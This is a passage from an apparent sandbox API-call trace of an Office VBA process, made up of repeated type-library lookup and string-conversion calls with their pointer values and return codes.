CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.586] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb2e60, pBstrName=0x0, pwOrdinal=0x33e4fb2e80 | out: pBstrDllName=0x33e4fb2e60*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb2e80*=0x30f0) returned 0x0 [0060.586] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb2e60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb2e60, pwOrdinal=0x500000000) returned 0x0 [0060.586] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39dc24e70, cb=0xc10) returned 0x1d39dbc8430 [0060.586] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb2f40, pIndex=0x0 | out: ppTLib=0x33e4fb2f40*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.587] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb2f50, pDummy=0x0 | out: ppTLibAttr=0x33e4fb2f50, pDummy=0x0) returned 0x0 [0060.587] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.587] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.587] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb2f40, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.587] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb2f40, pBstrName=0x0, pwOrdinal=0x33e4fb2f60 | out: pBstrDllName=0x33e4fb2f40*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb2f60*=0x31d0) returned 0x0 [0060.587] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb2f40, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb2f40, pwOrdinal=0x500000000) returned 0x0 [0060.587] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3020, pIndex=0x0 | out: ppTLib=0x33e4fb3020*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.587] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3030, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3030, pDummy=0x0) returned 0x0 [0060.587] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.587] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.587] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3020, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.587] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3020, pBstrName=0x0, pwOrdinal=0x33e4fb3040 | out: pBstrDllName=0x33e4fb3020*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3040*=0x32b0) returned 0x0 [0060.587] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3020, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3020, pwOrdinal=0x500000000) returned 0x0 [0060.587] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3100, pIndex=0x0 | out: ppTLib=0x33e4fb3100*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.587] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3110, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3110, pDummy=0x0) returned 0x0 [0060.587] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.587] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.587] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3100, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.588] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3100, pBstrName=0x0, pwOrdinal=0x33e4fb3120 | out: pBstrDllName=0x33e4fb3100*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3120*=0x3390) returned 0x0 [0060.588] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3100, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3100, pwOrdinal=0x500000000) returned 0x0 [0060.588] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb31e0, pIndex=0x0 | out: ppTLib=0x33e4fb31e0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.588] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb31f0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb31f0, pDummy=0x0) returned 0x0 [0060.588] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.588] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.588] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb31e0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.588] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb31e0, pBstrName=0x0, pwOrdinal=0x33e4fb3200 | out: pBstrDllName=0x33e4fb31e0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3200*=0x3470) returned 0x0 [0060.588] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb31e0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb31e0, pwOrdinal=0x500000000) returned 0x0 [0060.588] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb32c0, pIndex=0x0 | out: ppTLib=0x33e4fb32c0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.588] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb32d0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb32d0, pDummy=0x0) returned 0x0 [0060.588] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.588] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.588] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb32c0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.588] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb32c0, pBstrName=0x0, pwOrdinal=0x33e4fb32e0 | out: pBstrDllName=0x33e4fb32c0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb32e0*=0x3550) returned 0x0 [0060.588] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb32c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb32c0, pwOrdinal=0x500000000) returned 0x0 [0060.588] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb33a0, pIndex=0x0 | out: ppTLib=0x33e4fb33a0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.588] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb33b0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb33b0, pDummy=0x0) returned 0x0 [0060.588] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.588] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.588] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb33a0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.588] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb33a0, pBstrName=0x0, pwOrdinal=0x33e4fb33c0 | out: pBstrDllName=0x33e4fb33a0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb33c0*=0x3630) returned 0x0 [0060.588] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb33a0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb33a0, pwOrdinal=0x500000000) returned 0x0 [0060.589] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3480, pIndex=0x0 | out: ppTLib=0x33e4fb3480*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.589] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3490, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3490, pDummy=0x0) returned 0x0 [0060.589] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.589] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.589] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3480, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.589] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3480, pBstrName=0x0, pwOrdinal=0x33e4fb34a0 | out: pBstrDllName=0x33e4fb3480*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb34a0*=0x3710) returned 0x0 [0060.589] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3480, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3480, pwOrdinal=0x500000000) returned 0x0 [0060.589] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3560, pIndex=0x0 | out: ppTLib=0x33e4fb3560*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.589] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3570, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3570, pDummy=0x0) returned 0x0 [0060.589] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.589] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.589] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3560, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.589] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3560, pBstrName=0x0, pwOrdinal=0x33e4fb3580 | out: pBstrDllName=0x33e4fb3560*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3580*=0x37f0) returned 0x0 [0060.589] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3560, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3560, pwOrdinal=0x500000000) returned 0x0 [0060.589] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3640, pIndex=0x0 | out: ppTLib=0x33e4fb3640*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.589] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3650, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3650, pDummy=0x0) returned 0x0 [0060.589] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.589] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.589] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3640, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.589] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3640, pBstrName=0x0, pwOrdinal=0x33e4fb3660 | out: pBstrDllName=0x33e4fb3640*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3660*=0x38d0) returned 0x0 [0060.589] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3640, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3640, pwOrdinal=0x500000000) returned 0x0 [0060.589] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3720, pIndex=0x0 | out: ppTLib=0x33e4fb3720*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.589] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3730, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3730, pDummy=0x0) returned 0x0 [0060.589] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.589] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.590] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3720, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.590] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3720, pBstrName=0x0, pwOrdinal=0x33e4fb3740 | out: pBstrDllName=0x33e4fb3720*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3740*=0x39b0) returned 0x0 [0060.590] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3720, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3720, pwOrdinal=0x500000000) returned 0x0 [0060.590] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3800, pIndex=0x0 | out: ppTLib=0x33e4fb3800*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.590] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3810, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3810, pDummy=0x0) returned 0x0 [0060.590] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.590] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.590] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3800, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.590] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3800, pBstrName=0x0, pwOrdinal=0x33e4fb3820 | out: pBstrDllName=0x33e4fb3800*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3820*=0x3a90) returned 0x0 [0060.590] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3800, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3800, pwOrdinal=0x500000000) returned 0x0 [0060.590] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb38e0, pIndex=0x0 | out: ppTLib=0x33e4fb38e0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.590] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb38f0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb38f0, pDummy=0x0) returned 0x0 [0060.590] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.590] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.590] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb38e0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.590] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb38e0, pBstrName=0x0, pwOrdinal=0x33e4fb3900 | out: pBstrDllName=0x33e4fb38e0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3900*=0x3b70) returned 0x0 [0060.590] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb38e0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb38e0, pwOrdinal=0x500000000) returned 0x0 [0060.590] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb39c0, pIndex=0x0 | out: ppTLib=0x33e4fb39c0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.590] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb39d0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb39d0, pDummy=0x0) returned 0x0 [0060.590] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.590] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.590] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb39c0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.590] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb39c0, pBstrName=0x0, pwOrdinal=0x33e4fb39e0 | out: pBstrDllName=0x33e4fb39c0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb39e0*=0x3c50) returned 0x0 [0060.590] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb39c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb39c0, pwOrdinal=0x500000000) returned 0x0 [0060.591] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3aa0, pIndex=0x0 | out: ppTLib=0x33e4fb3aa0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.591] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3ab0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3ab0, pDummy=0x0) returned 0x0 [0060.591] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.591] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.591] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3aa0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.591] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3aa0, pBstrName=0x0, pwOrdinal=0x33e4fb3ac0 | out: pBstrDllName=0x33e4fb3aa0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3ac0*=0x3d30) returned 0x0 [0060.591] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3aa0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3aa0, pwOrdinal=0x500000000) returned 0x0 [0060.591] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3b80, pIndex=0x0 | out: ppTLib=0x33e4fb3b80*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.591] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3b90, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3b90, pDummy=0x0) returned 0x0 [0060.591] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.591] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.591] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3b80, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, 